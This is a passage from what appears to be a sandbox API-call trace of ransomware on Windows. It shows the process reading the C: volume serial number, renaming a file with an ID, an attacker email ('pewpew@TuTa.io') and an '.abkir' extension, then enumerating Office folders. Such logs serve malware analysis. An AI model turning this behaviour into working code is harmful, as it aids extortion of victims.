Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0202.403] WbemLocator:IUnknown:QueryInterface (in: This=0x6027230, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e504 | out: ppvObject=0x691e504*=0x0) returned 0x80004002 [0202.403] WbemLocator:IUnknown:QueryInterface (in: This=0x6027230, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e510 | out: ppvObject=0x691e510*=0x0) returned 0x80004002 [0202.403] CoGetContextToken (in: pToken=0x691e570 | out: pToken=0x691e570) returned 0x0 [0202.403] CoGetContextToken (in: pToken=0x691e978 | out: pToken=0x691e978) returned 0x0 [0202.403] WbemLocator:IUnknown:QueryInterface (in: This=0x6027230, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea08 | out: ppvObject=0x691ea08*=0x0) returned 0x80004002 [0202.403] WbemLocator:IUnknown:Release (This=0x6027230) returned 0x2 [0202.403] WbemLocator:IUnknown:Release (This=0x6027230) returned 0x1 [0202.403] CoGetContextToken (in: pToken=0x691efe8 | out: pToken=0x691efe8) returned 0x0 [0202.403] CoGetContextToken (in: pToken=0x691ef48 | out: pToken=0x691ef48) returned 0x0 [0202.403] WbemLocator:IUnknown:QueryInterface (in: This=0x6027230, riid=0x691f018*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f014 | out: ppvObject=0x691f014*=0x6027230) returned 0x0 [0202.403] WbemLocator:IUnknown:AddRef (This=0x6027230) returned 0x3 [0202.403] WbemLocator:IUnknown:Release (This=0x6027230) returned 0x2 [0202.403] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f1ac | out: puCount=0x691f1ac*=0x2) returned 0x0 [0202.403] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x691f1a8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1a8*=0xf, pszText=0x0) returned 0x0 [0202.403] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=8, puBuffLength=0x691f1a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.403] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f084 | out: ppv=0x691f084*=0x6027240) returned 0x0 [0202.403] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027240, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f118 | out: ppNamespace=0x691f118*=0x60336e4) returned 0x0 [0202.960] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691efb4 | out: ppvObject=0x691efb4*=0x66b47ac) returned 0x0 [0202.960] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66b47ac, pProxy=0x60336e4, pAuthnSvc=0x691f004, pAuthzSvc=0x691f000, pServerPrincName=0x691eff8, pAuthnLevel=0x691effc, pImpLevel=0x691efec, pAuthInfo=0x691eff0, pCapabilites=0x691eff4 | out: pAuthnSvc=0x691f004*=0xa, pAuthzSvc=0x691f000*=0x0, pServerPrincName=0x691eff8, pAuthnLevel=0x691effc*=0x6, pImpLevel=0x691efec*=0x2, pAuthInfo=0x691eff0, pCapabilites=0x691eff4*=0x1) returned 0x0 [0202.960] WbemLocator:IUnknown:Release (This=0x66b47ac) returned 0x1 [0202.960] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691efa8 | out: ppvObject=0x691efa8*=0x66b47cc) returned 0x0 [0202.960] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691efa4 | out: ppvObject=0x691efa4*=0x66b47ac) returned 0x0 [0202.960] WbemLocator:IClientSecurity:SetBlanket (This=0x66b47ac, pProxy=0x60336e4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0202.961] WbemLocator:IUnknown:Release (This=0x66b47ac) returned 0x2 [0202.961] WbemLocator:IUnknown:Release (This=0x66b47cc) returned 0x1 [0202.961] CoTaskMemFree (pv=0xbd4918) [0202.961] WbemLocator:IUnknown:Release (This=0x6027240) returned 0x0 [0202.961] WbemLocator:IUnknown:QueryInterface (in: This=0x60336e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eba4 | out: ppvObject=0x691eba4*=0x66b47cc) returned 0x0 [0202.961] WbemLocator:IUnknown:QueryInterface (in: This=0x66b47cc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691eb60 | out: ppvObject=0x691eb60*=0x0) returned 0x80004002 [0202.962] WbemLocator:IUnknown:QueryInterface (in: This=0x66b47cc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e97c | out: ppvObject=0x691e97c*=0x0) returned 0x80004002 [0202.964] WbemLocator:IUnknown:AddRef (This=0x66b47cc) returned 0x3 [0202.964] WbemLocator:IUnknown:QueryInterface (in: This=0x66b47cc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0202.965] WbemLocator:IUnknown:QueryInterface (in: This=0x66b47cc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e46c | out: ppvObject=0x691e46c*=0x0) returned 0x80004002 [0202.970] WbemLocator:IUnknown:QueryInterface (in: This=0x66b47cc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e478 | out: ppvObject=0x691e478*=0x66b472c) returned 0x0 [0202.971] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66b472c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e480 | out: pCid=0x691e480*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.971] WbemLocator:IUnknown:Release (This=0x66b472c) returned 0x3 [0202.971] CoGetContextToken (in: pToken=0x691e4d8 | out: pToken=0x691e4d8) returned 0x0 [0202.971] CoGetContextToken (in: pToken=0x691e8e0 | out: pToken=0x691e8e0) returned 0x0 [0202.971] WbemLocator:IUnknown:QueryInterface (in: This=0x66b47cc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e970 | out: ppvObject=0x691e970*=0x66b47b4) returned 0x0 [0202.971] WbemLocator:IRpcOptions:Query (in: This=0x66b47b4, pPrx=0x66b47cc, dwProperty=2, pdwValue=0x691e998 | out: pdwValue=0x691e998) returned 0x80004002 [0202.971] WbemLocator:IUnknown:Release (This=0x66b47b4) returned 0x3 [0202.971] WbemLocator:IUnknown:Release (This=0x66b47cc) returned 0x2 [0202.971] CoGetContextToken (in: pToken=0x691eeb8 | out: pToken=0x691eeb8) returned 0x0 [0202.971] CoGetContextToken (in: pToken=0x691ee18 | out: pToken=0x691ee18) returned 0x0 [0202.971] WbemLocator:IUnknown:QueryInterface (in: This=0x66b47cc, riid=0x691eee8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691eee4 | out: ppvObject=0x691eee4*=0x60336e4) returned 0x0 [0202.971] WbemLocator:IUnknown:AddRef (This=0x60336e4) returned 0x4 [0202.971] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x3 [0202.971] WbemLocator:IUnknown:Release (This=0x60336e4) returned 0x2 [0202.971] SysStringLen (param_1=0x0) returned 0x0 [0202.971] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60313c0, puCount=0x691f27c | out: puCount=0x691f27c*=0x0) returned 0x0 [0202.971] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f278*=0x0, pszText=0x0 | out: puBuffLength=0x691f278*=0x20, pszText=0x0) returned 0x0 [0202.971] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f278*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f278*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.971] CoGetContextToken (in: pToken=0x691eee8 | out: pToken=0x691eee8) returned 0x0 [0202.971] WbemLocator:IUnknown:AddRef (This=0x66b47cc) returned 0x3 [0202.971] WbemLocator:IUnknown:QueryInterface (in: This=0x66b47cc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed7c | out: ppvObject=0x691ed7c*=0x66b47cc) returned 0x0 [0202.972] WbemLocator:IUnknown:Release (This=0x66b47cc) returned 0x3 [0202.972] WbemLocator:IUnknown:Release (This=0x66b47cc) returned 0x2 [0202.972] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f280*=0x0, pszText=0x0 | out: puBuffLength=0x691f280*=0x20, pszText=0x0) returned 0x0 [0202.972] WbemDefPath:IWbemPath:GetText (in: This=0x60313c0, lFlags=2, puBuffLength=0x691f280*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f280*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.972] IWbemServices:GetObject (in: This=0x60336e4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x691f234*=0x0, ppCallResult=0x0 | out: ppObject=0x691f234*=0x60284b0, ppCallResult=0x0) returned 0x0 [0203.209] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031430, puCount=0x691f234 | out: puCount=0x691f234*=0x2) returned 0x0 [0203.209] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f230*=0x0, pszText=0x0 | out: puBuffLength=0x691f230*=0xf, pszText=0x0) returned 0x0 [0203.209] WbemDefPath:IWbemPath:GetText (in: This=0x6031430, lFlags=4, puBuffLength=0x691f230*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f230*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.209] IWbemClassObject:Get (in: This=0x60284b0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36c59cc*=0, plFlavor=0x36c59d0*=0 | out: pVal=0x691f230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36c59cc*=8, plFlavor=0x36c59d0*=0) returned 0x0 [0203.209] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.209] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.209] IWbemClassObject:Get (in: This=0x60284b0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x691f238*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36c59cc*=8, plFlavor=0x36c59d0*=0 | out: pVal=0x691f238*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36c59cc*=8, plFlavor=0x36c59d0*=0) returned 0x0 [0203.209] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.209] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.209] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", nBufferLength=0x105, lpBuffer=0x691ee38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat", lpFilePart=0x0) returned 0x35 [0203.209] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x691ee38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x58 [0203.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f298) returned 1 [0203.209] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), fInfoLevelId=0x0, lpFileInformation=0x691f314 | out: lpFileInformation=0x691f314*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x325a0620, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0203.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f294) returned 1 [0203.210] MoveFileW (lpExistingFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat"), lpNewFileName="C:\\ProgramData\\Microsoft\\Network\\Downloader\\qmgr1.dat.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\qmgr1.dat.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0203.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0203.212] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE", lpFilePart=0x0) returned 0x1f [0203.212] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\", lpFilePart=0x0) returned 0x20 [0203.212] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f1d0 [0203.213] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.214] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1 [0203.214] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1 [0203.214] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0203.214] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1 [0203.214] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointPortalSite.ico", cAlternateFileName="SHAREP~1.ICO")) returned 1 [0203.214] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad743900, ftCreationTime.dwHighDateTime=0x1c62706, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad743900, ftLastWriteTime.dwHighDateTime=0x1c62706, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointTeamSite.ico", cAlternateFileName="SHAREP~2.ICO")) returned 1 [0203.214] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 1 [0203.215] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UICaptions", cAlternateFileName="UICAPT~1")) returned 0 [0203.215] FindClose (in: hFindFile=0xb7f1d0 | out: hFindFile=0xb7f1d0) returned 1 [0203.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0203.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0203.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0203.215] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE", lpFilePart=0x0) returned 0x1f [0203.215] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\OFFICE\\", lpFilePart=0x0) returned 0x20 [0203.215] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\OFFICE\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f1d0 [0203.216] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.216] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5011dd00, ftCreationTime.dwHighDateTime=0x1ca04ff, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5011dd00, ftLastWriteTime.dwHighDateTime=0x1ca04ff, nFileSizeHigh=0x0, nFileSizeLow=0x1536, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssetLibrary.ico", cAlternateFileName="ASSETL~1.ICO")) returned 1 [0203.216] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabeeea00, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x51e19d30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xabeeea00, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DocumentRepository.ico", cAlternateFileName="DOCUME~1.ICO")) returned 1 [0203.217] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2bfbd800, ftCreationTime.dwHighDateTime=0x1c9facb, ftLastAccessTime.dwLowDateTime=0x6a3248d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2bfbd800, ftLastWriteTime.dwHighDateTime=0x1c9facb, nFileSizeHigh=0x0, nFileSizeLow=0x5532e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySharePoints.ico", cAlternateFileName="MYSHAR~1.ICO")) returned 1 [0203.217] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc92d1d00, ftCreationTime.dwHighDateTime=0x1c627a2, ftLastAccessTime.dwLowDateTime=0x594ac510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92d1d00, ftLastWriteTime.dwHighDateTime=0x1c627a2, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MySite.ico", cAlternateFileName="")) returned 1 [0203.217] FindNextFileW (in: hFindFile=0xb7f1d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf2444900, ftCreationTime.dwHighDateTime=0x1c63848, ftLastAccessTime.dwLowDateTime=0x5ab49610, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2444900, ftLastWriteTime.dwHighDateTime=0x1c63848, nFileSizeHigh=0x0, nFileSizeLow=0x627e, dwReserved0=0x0, dwReserved1=0x0, cFileName="SharePointPortalSite.ico", cAlternateFileName="SHAREP~1.ICO")) returned 1 [0203.217] FindNextFileW (in: hFindFile=0xb7f1d0, 